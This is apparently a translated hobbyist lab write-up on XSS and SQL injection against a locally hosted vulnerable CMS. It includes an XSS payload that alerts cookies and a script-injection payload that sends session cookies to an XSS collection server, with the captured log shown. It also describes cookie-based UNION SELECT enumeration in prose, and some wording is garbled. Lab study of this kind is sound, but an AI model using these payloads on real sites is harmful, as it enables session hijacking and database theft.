XSS and SQL injection Learning 1

Build a vulnerable web site locally to verify XSS vulnerabilities and how SQL injection is exploited.

Use the Phpstudy tool to build a gourmet CMS website platform.

0x01 XSS Test

To open debug mode, locate the name bar input box:

Try inserting the XSS attack code in value:

123 "><script>alert (Document.cookie);</script></td><td>

Click Update to successfully pop up the cookie information on the website after login. Note that this input box does not filter the <script> tags.

If you want to send this cookie to your XSS platform, you can construct the following input:

"/></td><script src=\" Http://127.0.0.1:9999/static/get.js\ "></script><td>

Http://127.0.0.1:9999/static/get.js the code to obtain information such as cookies for the local XSS platform.

You can see the following information locally: including cookie,user_agent,ipaddress and other information.

id:2j1h
Location:http://www.xdcms.com/index.php?m=member&f=edit
Toplocation:http://www.xdcms.com/index.php?m=member&f=edit
COOKIE:PHPSESSID=7URAPQFNC9CCHS31LFU38U0PI4; Member_user=xdcms; Member_userid=3
Opener
Http_user_agent mozilla/5.0 (Windows NT 6.1; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/61.0.3163.100 safari/537.36
Http_addr 127.0.0.1
[30/oct/2017 16:04:36] "GET/?do=api&id=2j1h&location=http%3a//www.xdcms.com/index.php%3fm%3dmember%26f%3dedit&toplocation =http%3a//www.xdcms.com/index.php%3fm%3dmember%26f%3dedit&cookie=phpsessid%3d7urapqfnc9cchs31lfu38u0pi4%3b %20member_user%3dxdcms%
3b%20member_userid%3d3&opener= http/1.1 "200 3

View the background database, found that the code is written to the database, do not know whether the storage-type XSS??? In summary, this will send cookie information to the XSS platform each time the page is refreshed.

0x02 SQL injection Test

The code of the time background PHP, found the input interface with MySQL Interactive statement:

The input parameter $userid the Member_userid parameter from the cookie, so the cookie injection method is used here.

Download a cookie Modify plugin, modify Member_userid

When Member_userid=1, the name is test, which can be seen by modifying this cookie value to read the database.

Use the Union Select to try to get more database information.

Test found member_userid=4 time, the name of the phone is empty, indicating that the database only 3 records;

Union Select,...... , the following error occurred:

There is a different number of columns, which shows that union select does not have the same number of columns as the table, and attempts to find 15 without an error:

From this display can be seen, user name, mobile phone number, name, security mailbox, contact address is the table of 3,13,12,15,14 column. You can export database information in these places.

XSS and SQL injection Learning 1